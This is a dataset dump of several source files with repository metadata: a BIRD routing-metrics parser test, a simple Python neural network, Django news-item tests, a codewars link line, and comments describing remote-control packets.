| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5e6d2abb95a444daea4416d31391eee55e8ce8ed
| 12,268
|
py
|
Python
|
birdwatcher_test.py
|
kumina/birdwatcher
|
f4b7d673fc972ae195d54b8d0b50661f00ab2c6c
|
[
"BSD-2-Clause"
] | 16
|
2017-02-17T01:02:55.000Z
|
2021-11-14T20:05:16.000Z
|
birdwatcher_test.py
|
kumina/birdwatcher
|
f4b7d673fc972ae195d54b8d0b50661f00ab2c6c
|
[
"BSD-2-Clause"
] | 3
|
2017-06-29T04:43:47.000Z
|
2018-01-11T11:05:47.000Z
|
birdwatcher_test.py
|
kumina/birdwatcher
|
f4b7d673fc972ae195d54b8d0b50661f00ab2c6c
|
[
"BSD-2-Clause"
] | 5
|
2017-02-27T13:50:54.000Z
|
2020-07-30T17:07:14.000Z
|
#!/usr/bin/env python
# Copyright (c) 2016 Kumina, https://kumina.nl/
#
# This file is distributed under a 2-clause BSD license.
# See the LICENSE file for details.
import StringIO
import birdwatcher
import unittest
class TestParseShowProtocols(unittest.TestCase):
def test_static(self):
"""Tests the metrics output for a static route."""
text = '''BIRD 1.5.0 ready.
name proto table state since info
static1 Static master up 2016-10-21
Preference: 200
Input filter: ACCEPT
Output filter: REJECT
Routes: 1 imported, 0 exported, 1 preferred
Route change stats: received rejected filtered ignored accepted
Import updates: 1 0 0 0 1
Import withdraws: 0 0 --- 0 0
Export updates: 0 0 0 --- 0
Export withdraws: 0 --- --- --- 0
'''
self.assertEqual(
list(birdwatcher.parse_show_protocols(StringIO.StringIO(text))),
[('bird_up{bird_protocol_instance="static1"}', 1),
('bird_preference{bird_protocol_instance="static1"}', 200),
('bird_routes{bird_protocol_instance="static1",bird_route_type="imported"}', 1),
('bird_routes{bird_protocol_instance="static1",bird_route_type="exported"}', 0),
('bird_routes{bird_protocol_instance="static1",bird_route_type="preferred"}', 1),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="updates",bird_outcome="received"}', 1),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="updates",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="updates",bird_outcome="filtered"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="updates",bird_outcome="ignored"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="updates",bird_outcome="accepted"}', 1),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="withdraws",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="withdraws",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="withdraws",bird_outcome="ignored"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="import",bird_action="withdraws",bird_outcome="accepted"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="export",bird_action="updates",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="export",bird_action="updates",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="export",bird_action="updates",bird_outcome="filtered"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="export",bird_action="updates",bird_outcome="accepted"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="export",bird_action="withdraws",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="static1",bird_direction="export",bird_action="withdraws",bird_outcome="accepted"}', 0)])
def test_mesh_start(self):
"""Tests the metrics output for a mesh route that is not up yet."""
text = '''BIRD 1.5.0 ready.
Mesh_10_101_4_114 BGP master start 2016-10-23 Active Socket: Host is unreachable
Description: Connection to BGP peer
Preference: 100
Input filter: ACCEPT
Output filter: calico_pools
Routes: 0 imported, 0 exported, 0 preferred
Route change stats: received rejected filtered ignored accepted
Import updates: 0 0 0 0 0
Import withdraws: 0 0 --- 0 0
Export updates: 0 0 0 --- 0
Export withdraws: 0 --- --- --- 0
BGP state: Active
Neighbor address: 10.101.4.114
Neighbor AS: 64511
Connect delay: 3/5
Last error: Socket: Host is unreachable
'''
self.assertEqual(
list(birdwatcher.parse_show_protocols(StringIO.StringIO(text))),
[('bird_up{bird_protocol_instance="Mesh_10_101_4_114"}', 0),
('bird_preference{bird_protocol_instance="Mesh_10_101_4_114"}', 100),
('bird_routes{bird_protocol_instance="Mesh_10_101_4_114",bird_route_type="imported"}', 0),
('bird_routes{bird_protocol_instance="Mesh_10_101_4_114",bird_route_type="exported"}', 0),
('bird_routes{bird_protocol_instance="Mesh_10_101_4_114",bird_route_type="preferred"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="updates",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="updates",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="updates",bird_outcome="filtered"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="updates",bird_outcome="ignored"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="updates",bird_outcome="accepted"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="withdraws",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="withdraws",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="withdraws",bird_outcome="ignored"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="import",bird_action="withdraws",bird_outcome="accepted"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="export",bird_action="updates",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="export",bird_action="updates",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="export",bird_action="updates",bird_outcome="filtered"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="export",bird_action="updates",bird_outcome="accepted"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="export",bird_action="withdraws",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_114",bird_direction="export",bird_action="withdraws",bird_outcome="accepted"}', 0),
('bird_bgp_state{bird_protocol_instance="Mesh_10_101_4_114",bird_bgp_state="Active"}', 1)])
def test_mesh_up(self):
"""Tests the metrics output for a mesh route that is up."""
text = '''BIRD 1.5.0 ready.
Mesh_10_101_4_182 BGP master up 2016-10-23 Established
Description: Connection to BGP peer
Preference: 100
Input filter: ACCEPT
Output filter: calico_pools
Routes: 1 imported, 1 exported, 1 preferred
Route change stats: received rejected filtered ignored accepted
Import updates: 1 0 0 0 1
Import withdraws: 0 0 --- 0 0
Export updates: 44 25 18 --- 1
Export withdraws: 0 --- --- --- 0
BGP state: Established
Neighbor address: 10.101.4.182
Neighbor AS: 64511
Neighbor ID: 10.101.4.182
Neighbor caps: refresh enhanced-refresh restart-able AS4 add-path-rx add-path-tx
Session: internal multihop AS4 add-path-rx add-path-tx
Source address: 10.101.4.148
Hold timer: 177/240
Keepalive timer: 61/80
'''
self.assertEqual(
list(birdwatcher.parse_show_protocols(StringIO.StringIO(text))),
[('bird_up{bird_protocol_instance="Mesh_10_101_4_182"}', 1),
('bird_preference{bird_protocol_instance="Mesh_10_101_4_182"}', 100),
('bird_routes{bird_protocol_instance="Mesh_10_101_4_182",bird_route_type="imported"}', 1),
('bird_routes{bird_protocol_instance="Mesh_10_101_4_182",bird_route_type="exported"}', 1),
('bird_routes{bird_protocol_instance="Mesh_10_101_4_182",bird_route_type="preferred"}', 1),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="updates",bird_outcome="received"}', 1),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="updates",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="updates",bird_outcome="filtered"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="updates",bird_outcome="ignored"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="updates",bird_outcome="accepted"}', 1),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="withdraws",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="withdraws",bird_outcome="rejected"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="withdraws",bird_outcome="ignored"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="import",bird_action="withdraws",bird_outcome="accepted"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="export",bird_action="updates",bird_outcome="received"}', 44),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="export",bird_action="updates",bird_outcome="rejected"}', 25),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="export",bird_action="updates",bird_outcome="filtered"}', 18),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="export",bird_action="updates",bird_outcome="accepted"}', 1),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="export",bird_action="withdraws",bird_outcome="received"}', 0),
('bird_route_changes{bird_protocol_instance="Mesh_10_101_4_182",bird_direction="export",bird_action="withdraws",bird_outcome="accepted"}', 0),
('bird_bgp_state{bird_protocol_instance="Mesh_10_101_4_182",bird_bgp_state="Established"}', 1),
('bird_hold_timer_current{bird_protocol_instance="Mesh_10_101_4_182"}', 177),
('bird_hold_timer_initial{bird_protocol_instance="Mesh_10_101_4_182"}', 240),
('bird_keepalive_timer_current{bird_protocol_instance="Mesh_10_101_4_182"}', 61),
('bird_keepalive_timer_initial{bird_protocol_instance="Mesh_10_101_4_182"}', 80)])
if __name__ == '__main__':
unittest.main()
| 80.710526
| 155
| 0.680388
| 1,555
| 12,268
| 4.967203
| 0.096463
| 0.102538
| 0.170896
| 0.062144
| 0.889824
| 0.875712
| 0.864707
| 0.855515
| 0.853962
| 0.831046
| 0
| 0.070398
| 0.1918
| 12,268
| 151
| 156
| 81.245033
| 0.708623
| 0.025758
| 0
| 0.268657
| 0
| 0.007463
| 0.823081
| 0.610795
| 0
| 0
| 0
| 0
| 0.022388
| 1
| 0.022388
| false
| 0
| 0.313433
| 0
| 0.343284
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
0d85e247ff8e31073c630b38d5e660939f7e6bd0
| 16,135
|
py
|
Python
|
networks.py
|
raginisharma14/Deep-Learning
|
df201ff8db9f2f0f252c53f81dd4ace2a1372bd0
|
[
"MIT"
] | null | null | null |
networks.py
|
raginisharma14/Deep-Learning
|
df201ff8db9f2f0f252c53f81dd4ace2a1372bd0
|
[
"MIT"
] | null | null | null |
networks.py
|
raginisharma14/Deep-Learning
|
df201ff8db9f2f0f252c53f81dd4ace2a1372bd0
|
[
"MIT"
] | null | null | null |
"""
MIT License
Copyright (c) 2017 Ragini Sharma
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy
import math
import random
class xor_net(object):
"""
This is a sample class for miniproject 1.
Args:
data: Is a tuple, ``(x,y)``
``x`` is a two or one dimensional ndarray ordered such that axis 0 is independent
data and data is spread along axis 1. If the array had only one dimension, it implies
that data is 1D.
``y`` is a 1D ndarray it will be of the same length as axis 0 or x.
"""
"""
This method is used to build the neural network
Args:
param1: takes no of input nodes
param2: takes no of hidden nodes in hidden layer1.
param3: takes no of hidden nodes in hidden layer2.
param4: takes no of output nodes.
Returns: Built network
"""
def build_network(self, n_inputs, n_hidden1, n_hidden2, n_outputs):
network = list()
hidden_layer1 = [{'weights':[random.random() for i in range(n_inputs + 1)]} for i in range(n_hidden1)]
network.append(hidden_layer1)
hidden_layer2 = [{'weights':[random.random() for i in range(n_hidden1 + 1)]} for i in range(n_hidden2)]
network.append(hidden_layer2)
output_layer = [{'weights':[random.random() for i in range(n_hidden2 + 1)]} for i in range(n_outputs)]
network.append(output_layer)
return network
"""
This method calculates the activation of each neuron.
Args:
param1: takes the weights and inputs of each neuron in each layer of the network
Returns: activated Value.
"""
def activate(self, weights, inputs):
activation = weights[-1]
for i in range(len(weights)-1):
activation += weights[i] * inputs[i]
return activation
"""
This method is the sigmoid function
Args:
param1: takes the activation value
Returns: Sigmoid value of the activation.
"""
def sigmoid(self, activation):
return 1.0 / (1.0 + math.exp(-activation))
"""
This method is used to do the forward propogation of the neural network
Args:
param1: takes the built network
param2: takes each sample of the dataset.
Returns: Predicted Value.
"""
def forward_propagation(self,network, row):
inputs = row
for layer in network:
new_inputs = []
for node in layer:
activation = self.activate(node['weights'], inputs)
node['output'] = self.sigmoid(activation)
new_inputs.append(node['output'])
inputs = new_inputs
return inputs
def sigmoid_derivative(self,output):
return output * (1.0 - output)
"""
This method does the backpropogation. Calculate the gradients for each sample
and modify the weights.
Args:
Param1: Takes network
Param2: Takes the expected values
"""
def back_propagation(self,network, expected):
for i in reversed(range(len(network))):
layer = network[i]
errors = list()
if i != len(network)-1:
for j in range(len(layer)):
error = 0.0
for node in network[i + 1]:
error += (node['weights'][j] * node['delta'])
errors.append(error)
else:
for j in range(len(layer)):
node = layer[j]
errors.append(expected[j] - node['output'])
for j in range(len(layer)):
node = layer[j]
node['delta'] = errors[j] * self.sigmoid_derivative(node['output'])
def update_weights(self,network, row, l_rate):
for i in range(len(network)):
inputs = row[:-1]
if i != 0:
inputs = [node['output'] for node in network[i - 1]]
for node in network[i]:
for j in range(len(inputs)):
node['weights'][j] += l_rate * node['delta'] * inputs[j]
node['weights'][-1] += l_rate * node['delta']
"""
This method is used to train the neural network
Args:
param1: takes the network
param2: takes the dataset.
param3: takes the learning rate
param4: No of epochs
param5: No Of output nodes.
"""
"""
Here the neural network uses stochastic gradient descent and not batch gradient descent as we are looping through one sample at a time.
Each iteration has one sample. Loss is calculated for that particular sample, and then we are updating weights in the same iteration itself.
"""
def train_network(self,network, train, l_rate, n_epoch, n_outputs):
for epoch in range(n_epoch):
sum_error = 0
for row in train:
outputs = self.forward_propagation(network, row)
expected = [0 for i in range(n_outputs)]
expected[int(row[-1])] = 1
sum_error += sum([(expected[i]-outputs[i])**2 for i in range(len(expected))])
self.back_propagation(network, expected)
self.update_weights(network, row, l_rate)
print('epoch=%d, learningrate=%.3f, loss=%.3f' % (epoch, l_rate, sum_error))
self.network = network
def __init__(self, data, labels):
rows, columns = data.shape
labels = numpy.array([labels], dtype=int)
a = numpy.concatenate((data, labels.T), axis =1)
n_inputs = len(a[0]) - 1
n_outputs = len(set([row[-1] for row in a]))
# build network with 2 hidden layers and 10 nodes in each hidden layer
network = self.build_network(n_inputs, 10,10, n_outputs)
self.train_network(network, a, 0.5, 100, n_outputs)
for layer in network:
print(layer)
def get_params (self):
self.params = [] # [(w,b),(w,b)]
"""
Method that should return the model parameters.
self.params = [] # [(w,b),(w,b)]
Returns:
tuple of numpy.ndarray: (w, b).
Notes:
This code will return an empty list for demonstration purposes. A list of tuples of
weoghts and bias for each layer. Ordering should from input to outputt
"""
return self.params
def get_predictions (self, x):
"""
Method should return the outputs given unseen data
Args:
x: array similar to ``x`` in ``data``. Might be of different size.
Returns:
numpy.ndarray: ``y`` which is a 1D array of predictions of the same length as axis 0 of
``x``
Notes:
Temporarily returns random numpy array for demonstration purposes.
"""
# Here is where you write a code to evaluate the data and produce predictions.
a, b = x.shape
rows, columns = x.shape
labels = numpy.zeros(shape=(rows))
labels = numpy.array([labels])
a = numpy.concatenate((x, labels.T), axis =1)
rows,columns = a.shape
result = numpy.zeros(shape= rows)
i=0
for row in a:
outputs = self.forward_propagation(self.network, row)
result[i]= outputs.index(max(outputs))
i =i+1
return result
class mlnn(xor_net):
"""
Build neural network with 6 hidden layers and different nodes in each layer.
"""
def initialize_network(self, n_inputs, n_hidden1, n_hidden2, n_hidden3, n_hidden4, n_hidden5, n_hidden6, n_outputs):
network = list()
hidden_layer1 = [{'weights':[random.random() for i in range(n_inputs + 1)]} for i in range(n_hidden1)]
network.append(hidden_layer1)
hidden_layer2 = [{'weights':[random.random() for i in range(n_hidden1 + 1)]} for i in range(n_hidden2)]
network.append(hidden_layer2)
hidden_layer3 = [{'weights':[random.random() for i in range(n_hidden2 + 1)]} for i in range(n_hidden3)]
network.append(hidden_layer3)
hidden_layer4 = [{'weights':[random.random() for i in range(n_hidden3 + 1)]} for i in range(n_hidden4)]
network.append(hidden_layer4)
hidden_layer5 = [{'weights':[random.random() for i in range(n_hidden4 + 1)]} for i in range(n_hidden5)]
network.append(hidden_layer5)
hidden_layer6 = [{'weights':[random.random() for i in range(n_hidden5 + 1)]} for i in range(n_hidden6)]
network.append(hidden_layer6)
output_layer = [{'weights':[random.random() for i in range(n_hidden6 + 1)]} for i in range(n_outputs)]
network.append(output_layer)
return network
"""
This method calculates the activation of each neuron.
Args:
param1: takes the weights and inputs of each neuron in each layer of the network
Returns: activated Value.
"""
def activate(self, weights, inputs):
activation = weights[-1]
for i in range(len(weights)-1):
activation += weights[i] * inputs[i]
return activation
"""
This method is the sigmoid function
Args:
param1: takes the activation value
Returns: Sigmoid value of the activation.
"""
def sigmoid(self, activation):
return 1.0 / (1.0 + math.exp(-activation))
"""
This method is used to do the forward propogation of the neural network
Args:
param1: takes the built network
param2: takes each sample of the dataset.
Returns: Predicted Value.
"""
def forward_propagation(self,network, row):
inputs = row
for layer in network:
new_inputs = []
for node in layer:
activation = self.activate(node['weights'], inputs)
node['output'] = self.sigmoid(activation)
new_inputs.append(node['output'])
inputs = new_inputs
return inputs
def sigmoid_derivative(self,output):
return output * (1.0 - output)
"""
This method does the backpropogation. Calculate the gradients for each sample
and modify the weights.
Args:
Param1: Takes network
Param2: Takes the expected values
"""
def back_propagation(self,network, expected):
for i in reversed(range(len(network))):
layer = network[i]
errors = list()
if i != len(network)-1:
for j in range(len(layer)):
error = 0.0
for node in network[i + 1]:
error += (node['weights'][j] * node['delta'])
errors.append(error)
else:
for j in range(len(layer)):
node = layer[j]
errors.append(expected[j] - node['output'])
for j in range(len(layer)):
node = layer[j]
node['delta'] = errors[j] * self.sigmoid_derivative(node['output'])
def update_weights(self,network, row, l_rate):
for i in range(len(network)):
inputs = row[:-1]
if i != 0:
inputs = [node['output'] for node in network[i - 1]]
for node in network[i]:
for j in range(len(inputs)):
node['weights'][j] += l_rate * node['delta'] * inputs[j]
node['weights'][-1] += l_rate * node['delta']
"""
This method is used to train the neural network
Args:
param1: takes the network
param2: takes the dataset.
param3: takes the learning rate
param4: No of epochs
param5: No Of output nodes.
"""
def train_network(self,network, train, l_rate, n_epoch, n_outputs):
for epoch in range(n_epoch):
sum_error = 0
for row in train:
outputs = self.forward_propagation(network, row)
expected = [0 for i in range(n_outputs)]
expected[int(row[-1])] = 1
sum_error += sum([(expected[i]-outputs[i])**2 for i in range(len(expected))])
self.back_propagation(network, expected)
self.update_weights(network, row, l_rate)
print('epoch=%d, learningrate=%.3f, loss=%.3f' % (epoch, l_rate, sum_error))
self.network = network
def __init__(self, data, labels):
rows, columns = data.shape
print ("columns", columns)
print(data)
print(labels)
labels = numpy.array([labels], dtype=int)
a = numpy.concatenate((data, labels.T), axis =1)
n_inputs = len(a[0]) - 1
n_outputs = len(set([row[-1] for row in a]))
network = self.initialize_network(n_inputs, 20, 20, 20, 10,10,5,n_outputs)
self.train_network(network, a, 0.2, 100, n_outputs)
for layer in network:
print(layer)
def get_params (self):
self.params = [] # [(w,b),(w,b)]
"""
Method that should return the model parameters.
self.params = [] # [(w,b),(w,b)]
Returns:
tuple of numpy.ndarray: (w, b).
Notes:
This code will return an empty list for demonstration purposes. A list of tuples of
weoghts and bias for each layer. Ordering should from input to outputt
"""
return self.params
def get_predictions (self, x):
"""
Method should return the outputs given unseen data
Args:
x: array similar to ``x`` in ``data``. Might be of different size.
Returns:
numpy.ndarray: ``y`` which is a 1D array of predictions of the same length as axis 0 of
``x``
Notes:
Temporarily returns random numpy array for demonstration purposes.
"""
# Here is where you write a code to evaluate the data and produce predictions.
a, b = x.shape
rows, columns = x.shape
labels = numpy.zeros(shape=(rows))
labels = numpy.array([labels])
a = numpy.concatenate((x, labels.T), axis =1)
rows,columns = a.shape
result = numpy.zeros(shape= rows)
i=0
for row in a:
outputs = self.forward_propagation(self.network, row)
result[i]= outputs.index(max(outputs))
i =i+1
return result
if __name__ == '__main__':
pass
| 37.523256
| 142
| 0.563557
| 2,018
| 16,135
| 4.43558
| 0.147671
| 0.029717
| 0.020109
| 0.03441
| 0.786281
| 0.78427
| 0.770193
| 0.761479
| 0.743716
| 0.736007
| 0
| 0.017047
| 0.341927
| 16,135
| 429
| 143
| 37.610723
| 0.825956
| 0.01661
| 0
| 0.872549
| 0
| 0
| 0.032884
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.004902
| 0.014706
| null | null | 0.034314
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0da0056259d06504ba795b71c756cf6bc2906891
| 3,421
|
py
|
Python
|
tests/test_models.py
|
franck-6/django_site_news-1
|
8f2de354ff8fa3953110ccb6b6d5c2879b1f38fe
|
[
"MIT"
] | null | null | null |
tests/test_models.py
|
franck-6/django_site_news-1
|
8f2de354ff8fa3953110ccb6b6d5c2879b1f38fe
|
[
"MIT"
] | null | null | null |
tests/test_models.py
|
franck-6/django_site_news-1
|
8f2de354ff8fa3953110ccb6b6d5c2879b1f38fe
|
[
"MIT"
] | 2
|
2015-05-25T12:42:02.000Z
|
2018-11-26T04:42:07.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
from django.contrib.sites.models import Site
from site_news.models import NewsItem, NewsItemManager
def _get_site():
return Site.objects.get_or_create(domain='mock')[0]
class NewsItemTestCase(unittest.TestCase):
def setUp(self):
from django.core.management import call_command
call_command('loaddata', 'tests/fixtures/test_data.json', verbosity=0)
def test_get_latest(self):
"""
Get all items, ordered by dates.
"""
qs = NewsItem.objects.get_latest()
self.assertEqual(qs.count(), 12)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
def test_get_latest_with_max_items(self):
"""
Get all items, ordered by dates and trimmed to max_items.
"""
qs = NewsItem.objects.get_latest(max_items=4)
self.assertEqual(qs.count(), 4)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
def test_get_latest_by_site(self):
"""
Get all items for given site, ordered by dates.
"""
qs = NewsItem.objects.get_latest_by_site(
site=Site.objects.get(domain='buytowels.com'))
self.assertEqual(qs.count(), 6)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
def test_get_latest_by_site_with_max_items(self):
"""
Get all items for given site, ordered by dates and trimmed to max_items.
"""
qs = NewsItem.objects.get_latest_by_site(
site=Site.objects.get(domain='buytowels.com'),
max_items=3)
self.assertEqual(qs.count(), 3)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
def test_get_latest_published(self):
"""
Get published items, ordered by dates.
"""
qs = NewsItem.objects_published.get_latest()
self.assertEqual(qs.count(), 7)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
def test_get_latest_published_with_max_items(self):
"""
Get published items, ordered by dates and trimmed to max_items.
"""
qs = NewsItem.objects_published.get_latest(max_items=4)
self.assertEqual(qs.count(), 4)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
def test_get_latest_published_by_site(self):
"""
Get published items for given site, ordered by dates.
"""
qs = NewsItem.objects_published.get_latest_by_site(
site=Site.objects.get(domain='buytowels.com'))
self.assertEqual(qs.count(), 6)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
def test_get_latest_published_by_site_with_max_items(self):
"""
Get published items for given site, ordered by dates and trimmed to max_items.
"""
qs = NewsItem.objects_published.get_latest_by_site(
site=Site.objects.get(domain='buytowels.com'),
max_items=3)
self.assertEqual(qs.count(), 3)
self.assertTrue(qs[0].date >= qs[1].date)
self.assertTrue(qs[1].date >= qs[2].date)
| 36.393617
| 90
| 0.61824
| 464
| 3,421
| 4.383621
| 0.150862
| 0.070796
| 0.12586
| 0.06293
| 0.826942
| 0.826942
| 0.80531
| 0.751229
| 0.731563
| 0.707473
| 0
| 0.018721
| 0.250512
| 3,421
| 94
| 91
| 36.393617
| 0.774571
| 0.137387
| 0
| 0.571429
| 0
| 0
| 0.034004
| 0.010603
| 0
| 0
| 0
| 0
| 0.428571
| 1
| 0.178571
| false
| 0
| 0.089286
| 0.017857
| 0.303571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0da4d23c050c9342875ef0222a02c899afacde41
| 123
|
py
|
Python
|
py/re_sub_lambda.py
|
scoraig52/code
|
c9335071266267227b56e48861a4f188d16ca4a4
|
[
"MIT"
] | 2
|
2021-02-18T04:42:40.000Z
|
2021-12-12T00:27:42.000Z
|
py/re_sub_lambda.py
|
akar-0/code
|
be15d79e7c9de107cc66cbdfcb3ae91a799607dd
|
[
"MIT"
] | null | null | null |
py/re_sub_lambda.py
|
akar-0/code
|
be15d79e7c9de107cc66cbdfcb3ae91a799607dd
|
[
"MIT"
] | 1
|
2021-11-20T10:24:09.000Z
|
2021-11-20T10:24:09.000Z
|
// https://www.codewars.com/kata/reviews/547bbf3d2d47f7a96f0001ce/groups/547bbf40ec2cf18cf60001d4#611bc5ad9119190048b04283
| 61.5
| 122
| 0.878049
| 10
| 123
| 10.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.38843
| 0.01626
| 123
| 1
| 123
| 123
| 0.504132
| 0.195122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0dd4f5b9077e8d0fdb2ba50cd30d712dce4138a7
| 1,891
|
py
|
Python
|
blackbean/commands.py
|
hine/homeserver
|
21adfbf148cb387f3ba3922515d1c01ad3e81499
|
[
"MIT"
] | 3
|
2018-03-13T06:35:19.000Z
|
2018-12-26T12:49:10.000Z
|
blackbean/commands.py
|
hine/homeserver
|
21adfbf148cb387f3ba3922515d1c01ad3e81499
|
[
"MIT"
] | null | null | null |
blackbean/commands.py
|
hine/homeserver
|
21adfbf148cb387f3ba3922515d1c01ad3e81499
|
[
"MIT"
] | null | null | null |
# Remote-control command packets keyed by "<device>/<action>".
# Each value is a hex-encoded raw packet to be sent by a blaster device.
# NOTE(review): every packet starts with 0x26, which in the Broadlink RM
# protocol marks an *IR* payload, even though the dict is named
# rf_commands — presumably these are replayed captures; confirm against
# the code that transmits them. The trailing "0d05" + zero padding looks
# like the standard end-of-packet terminator — TODO confirm.
